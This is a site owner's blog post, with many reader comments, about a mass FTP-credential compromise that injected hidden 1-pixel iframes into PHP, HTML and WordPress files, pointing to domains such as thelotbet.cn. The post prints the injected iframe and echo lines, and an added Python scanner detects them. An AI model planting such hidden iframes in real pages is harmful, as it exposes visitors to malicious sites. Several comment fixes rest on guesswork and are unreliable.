Is FTP Virus Attaching Iframes To My Web Pages From Goooogleadsence.biz, LotAnte.cn, TheLotBet.cn, and HyperLiteAutoServices.cn
Goooogleadsence.biz, LotAnte.cn, TheLotBet.cn, HyperLiteAutoServices.cn and others
All directories and most pages on my websites have been edited by an outside source. Somehow, I believe, a worm is spreading via my FileZilla FTP client. Supposedly, there is malicious code on my PC that is uploading the links to
internetcountercheck.com / click 3799328
goooogleadsence.biz / click sd3c45
lotante.cn/ income 37
thelotbet.cn/in.cgi?income39
I’ve learned that it’s probably something malicious or viral on MY MACHINE that’s making its way to my sites via my FileZilla FTP client. It’s editing or adding footers with iframes to my PHP and HTML pages.
I don’t allow any downloads to my machine, I mean, I keep a close eye on the activity, but, I do share this PC on a network with another PC in the home. Coincidentally, something went haywire with the other machine during all this fiasco - and I had to reinstall the operating system, Win XP Home. Maybe some viral junk migrated through the home network somehow and then started eating away at my site files.
This is awful. I have so much editing to do and I don’t even know how this happened. I do not know how to prevent this happening again. This is why I am taking so long to fix the files, I feel like I’m fighting a losing battle.
My antivirus software quarantined a couple of things - I don’t remember what they were, and I can’t access the virus chest because of my PC settings. I think I have been the butt of an April Fools Virus.
echo iframe src=\”http://internetcountercheck.com/?click=3799328\” width=1 height=1 style=\”visibility:hidden;position:absolute\
echo iframe src=\”http://goooogleadsence.biz/?click=5D3C49\” width=1 height=1 style=\”visibility:hidden;position:absolute iframe
?>
iframe src=”http://lotante.cn/in.cgi?income37″ width=1 height=1 style=”visibility: hidden”/iframe>
frame src=”http://thelotbet.cn/in.cgi?income39″ width=1 height=1 style=”visibility: hidden”iframe
….
OMG, I was hand editing all the files and WordPress installations on my sites. I got so tired and worried about missing something that I just went ahead and re-uploaded WordPress 2.71 instead of trying to find all the files on each site and directory. The plus side, I suppose, is that some of my WordPress installations were really due for an update.
The following directories/files were contaminated with some kind of alteration which placed IFRAMES pointing to roguish sites. What a bummer. What a hassle. What a waste of important coding time. Seriously!!
WP INCLUDES/DEFAULT FILTER PHP
(iframe src=”http://thelotbet.cn/in.cgi?income39″ width=1 height=1 style=”visibility: hidden”)(/iframe)
WP CONTENT/INDEX
(?php
// Silence is golden.
?)
(iframe src=”http://thelotbet.cn/in.cgi?income39″ width=1 height=1 style=”visibility: hidden”)(/iframe)
WP ADMIN / index-extra.php
(iframe src=”http://thelotbet.cn/in.cgi?income39″ width=1 height=1 style=”visibility: hidden”)(/iframe)
WP ADMIN / INDEX
(iframe src=”http://thelotbet.cn/in.cgi?income39″ width=1 height=1 style=”visibility: hidden”)(/iframe)
echo “(iframe src=\”http://internetcountercheck.com/?click=3763531\” width=1 height=1 style=\”visibility:hidden;position:absolute\”)(/iframe)”;
echo “(iframe src=\”http://goooogleadsence.biz/?click=5C9FF9\” width=1 height=1 style=\”visibility:hidden;position:absolute\”)(/iframe)”;
?)
(iframe src=”http://lotante.cn/in.cgi?income37″ width=1 height=1 style=”visibility: hidden”)(/iframe)
(iframe src=”http://thelotbet.cn/in.cgi?income39″ width=1 height=1 style=”visibility: hidden”)(/iframe)
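A way to find these footers without hand-searching every file, as an added example that is not part of the original post: it scans a downloaded copy of a site for iframes that are 0 or 1 pixel in size or hidden by CSS, the pattern shown in the listing above. The function names and the `example.invalid` hosts in the constructed sample are assumptions made for illustration.

```python
import os
import re

# Opening iframe tag; attribute quotes may be plain or backslash-escaped,
# as they are when the tag sits inside a PHP echo string.
IFRAME_RE = re.compile(r"<iframe\b[^>]*>", re.IGNORECASE)
SRC_RE = re.compile(r"""src\s*=\s*\\?["']?\s*(?:https?:)?//([^/\s"'\\?>]+)""", re.IGNORECASE)
TINY_RE = re.compile(r"""\b(?:width|height)\s*=\s*\\?["']?[01]\b""", re.IGNORECASE)
HIDDEN_RE = re.compile(r"visibility\s*:\s*hidden|display\s*:\s*none", re.IGNORECASE)
WEB_EXTS = (".php", ".html", ".htm", ".asp")

# Constructed sample: a WordPress-style index.php with an injected footer.
SAMPLE = (
    "<?php\n// Silence is golden.\n"
    'echo "<iframe src=\\"http://ads.example.invalid/?click=0\\" width=1 height=1></iframe>";\n'
    "?>\n"
    '<iframe src="http://bad.example.invalid/in.cgi?x" width=1 height=1 style="visibility: hidden"></iframe>\n'
    '<iframe src="https://video.example.org/embed/1" width="560" height="315"></iframe>\n'
)


def find_hidden_iframes(text):
    """Return [(line_number, src_host)] for iframes that are 0/1 px or CSS-hidden."""
    hits = []
    for m in IFRAME_RE.finditer(text):
        tag = m.group(0)
        if not (TINY_RE.search(tag) or HIDDEN_RE.search(tag)):
            continue  # visible iframe, e.g. a legitimate video embed
        src = SRC_RE.search(tag)
        host = src.group(1).lower() if src else "(no src)"
        hits.append((text.count("\n", 0, m.start()) + 1, host))
    return hits


def scan_tree(root):
    """Walk a local copy of a site and map relative path -> list of hits."""
    report = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name.lower().endswith(WEB_EXTS):
                path = os.path.join(dirpath, name)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    hits = find_hidden_iframes(fh.read())
                if hits:
                    report[os.path.relpath(path, root)] = hits
    return report
```

Run `scan_tree` over a fresh download of the site rather than the local working copy, since the injected footers appear in the files on the server.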
Comments
I’m experiencing the same problem. Have you had any joy resolving it? What steps have you taken?
bradfieldsbrain [at] googlemail.com
I’ve had this happen to a lot of sites recently. Also using FileZilla. It’s happened twice to some sites. Also, FileZilla stores passwords locally in XML files without any encryption. I changed all passwords but I reckon we missed 1 or 2 which got rehit. We ran avast, adaware, spybot, malware bytes, pctools and nothing was detected. Not sure what to do!!!!
Hey, you need to NOT SAVE PASSWORDS in filezilla once you’ve changed them!!
Another step I’m taking is reinstalling all my wordpress scripts.
Also, I have to hand edit a bunch of my HTML files and remove this ridiculous code. I’m sure there is an easier way, but I’m flummoxed!
My website also got the same problem. modified by iframe and even login with ftp account from different ip addresses. These guys are nasty.
Man, they got almost every site in my FileZilla FTP. They obviously have figured out how to steal the passwords. I have had to fix about 10 sites. I want to f***ing kill these guys
Whoa, that’s happened to me for the first time…I thought my site was hackproof?! Any news on how to prevent this from happening?
I’ve had the same trouble just recently. My experience:
My computer suddenly became deluged with viruses after visiting a web hosting site… shortly thereafter I noticed this type of malicious code in html files for several of my websites, some on different hosting servers and account.
My take on it:
The only thing I can think of is a virus hopped onto my computer from the hosting website, and this virus is inserting code into my html files.
The question:
Does this virus simply search computers for html files and insert the code? I use Microsoft Expression Web exclusively for uploading and editing - is this virus acting through Expression Web? What programs do you all use for editing and uploading?
This seems like a new virus hitting the web (?), hopefully the authorities will be alerted to it soon and we can get some comprehensive protection.
Having the same problem, are all mostly filezilla users? How do we stop this?
Had the same problems. Over 50 websites hit! The files on my computer are not changed, but yes, when uploading with FileZilla for some reason they are changed to add these iframes. Not the end of the world if all I have to do is change the FTP password and reupload the sites, but I just hope it is not a recurring thing. Godaddy says it’s nothing on their end, if that makes a difference to anyone.
yes, this is a horrible problem. I saw that and few days back i removed it from my friend’s website.
Is this recurring for anyone? Must have cleaned 500 sites at this stage! Thrown infected of in the bin. Has anyone found that command prompt does not work?
I am also experiencing the same problem. What I have observed is that the virus only affects files having the word “index” in their names. Not all the pages are getting infected.
I have scanned my PC several times but nothing found in it.
Don’t be so sure on that. Look at the post above carefully. I had this in my DEFAULT FILTER PHP also! Take care.
any idea how to stop that,
I recommend (before pulling your hair out) - install AVAST free virus protection onto your COMPUTER and always run onboard protection with its web scanner activated. Clean up your machine. Don’t store passwords in your FTP client. CLEAN UP YOUR WEBSITES BY HAND, or like me on some websites, Replace all Wordpress files (BE CAREFUL OF YOUR CONTENT FOLDER),and, yes, your themes will need a hand edit most likely.
I dont know if it was posted, so i tried again LOL sorry
I have faced the same problem. I formatted my PC 5 times, I bought a new laptop to try and see if the problem was from my PC, and I uploaded an empty HTML page with FileZilla; a few minutes later I saw that it had this additional iframe malware. What pissed me off is that I saw Google saying that my site is malware.
hell this is giving me headaches
I had to remake all the infected pages. I am from Brazil. The ideal is to use SFTP, which is safer.
we use cuteFTP pro and a few days ago we saw that most websites have been infected. we spent 2 days wiping the hard drive and reinstalling everything. i used my laptop from home to change all client passwords and will not store passwords on my ftp programs ever again.
also everything with the word HOME, INDEX, DEFAULT and MAIN had gotten infected with the damn crap and some of the footers have been compromised.
here’s looking at some ulcers!
Same problems here. 30 of my sites are affected. I cleaned the iframe script in all index pages but it kept on appearing again. My hosting provider gave me a breather for 10 days. They ran a cleaning script on the server. Now today it appeared again on 1 site, I fear it will infect all my sites again….did anyone find a solution?
I am as sad as you all guys. I have had this problem frequently and would reinstall everything. change passwords. if virus hit my site. I format my pc and the process goes on. You know, I am very happy that i am not the only one who faces this virus shock
There is hope for some solution!
This virus is extremely hard to deal with. Sites that have any PHP code are affected the most. It seems like the virus initiates from an infected PC. I have tried so many different things without any luck. The best thing to do is to use an older copy of the website if you have one. If not, try to clean the infected files by scanning them in avast (which is by far the best antivirus that catches this malicious virus), note the files that are infected, then open them in Dreamweaver and search for “iframe” in the source code. You will see the iframe script. Delete the entire script and then save the file. Make sure you search for the word “iframe” more than once to be 100% sure that you delete all references to it in the code. Once you clean the files, go to a clean PC and change both your FTP and cPanel passwords. Then, using the clean PC, upload the files that you cleaned. This is about the only way of dealing with this piece of crap. May God burn the creator of this virus in hell…
It’s also attacking default.asp, home.asp, login.asp and adds the code with iframes pointing to following URLs:
zenitchampion.cn/nic/main.php
vipprojects.cn
delzzerro.cn
updatedate.cn
Fortunately the asp files are not affected, because double quotes in the malicious code are not escaped and the ASP server can not render the page and generates an error.
All 4 websites I’m managing that had the code attached are hosted by godaddy.
I’m uploading clean files using Total Commander ftp and they are clean after the upload. After several days they get infected again. Other websites I manage are hosted by webecs and do not have these problems at all.
I think that this is godaddy issue. I’m going to call them.
Guys, this virus can steal FTP passwords even if they are NOT stored on your computer. It’s enough to log in… sometimes even if your computer is clean, but some other on the LAN isn’t. See here.
Hello everybody, my name is Roberto and I live in Brazil. I managed to put a stop to this problem. I just kept giving permission (444) on the server for all my files index.htm, index.html, index.php and others who were also infected. Now the problem no longer exists. Thank you Lord my God.